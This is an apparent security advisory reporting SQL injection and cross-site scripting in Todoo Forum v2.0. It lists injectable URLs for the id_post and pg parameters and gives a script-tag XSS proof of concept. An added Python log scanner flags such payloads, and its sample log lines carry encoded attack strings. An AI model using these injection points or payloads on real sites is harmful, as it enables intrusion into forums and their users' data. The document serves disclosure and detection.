Title: Todoo Forum v2.0 - Multiple Vulnerabilities
Author: snake eye
Date: 04-13-2013
Category: web applications
Verified: Verified
Affected version: v2.0
Platform: windows
Vendor: http://www.todoomasters.com/
[+] SQL Injection
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]
[+] Cross-site scripting
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>
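For operators of an affected install, a log review for the two parameters listed above, as an added example that is not part of the original advisory. It assumes a Common/Combined Log Format access log and that id_post and pg are meant to carry plain integers (as in the advisory's sample URLs); the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

SCRIPT = "todooforum.php"
# Parameters named in the advisory. Assumption: the application expects plain
# non-negative integers here, as in the advisory's own sample URLs.
NUMERIC_PARAMS = ("id_post", "pg")
# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]{1,10}")

def suspicious_params(target):
    """Return {param: decoded value} for id_post/pg values that are not integers."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + SCRIPT):
        return {}
    # parse_qs percent-decodes, so encoded quotes and angle brackets are seen as-is.
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if not INTEGER_RE.fullmatch(value):
                bad[name] = value
    return bad

def scan(lines):
    """Return [(line number, {param: value})] for log lines worth reviewing."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        bad = suspicious_params(match.group(1)) if match else {}
        if bad:
            findings.append((lineno, bad))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Apr/2013:10:00:00 +0000] "GET /todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [13/Apr/2013:10:02:11 +0000] "GET /todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1%27&pg=1 HTTP/1.1" 200 312',
    '192.0.2.44 - - [13/Apr/2013:10:02:40 +0000] "GET /todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg=%3Cscript%3Ealert(0x0000)%3C/script%3E HTTP/1.1" 200 4801',
    '192.0.2.10 - - [13/Apr/2013:10:03:05 +0000] "GET /index.php?id_post=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, bad in scan(SAMPLE_LOG):
        print(f"line {lineno}: non-integer value in {bad}")
```

The same integer-only rule can be enforced in front of the application (reverse proxy or WAF) until the parameters are validated and parameterized in the forum code itself.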
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information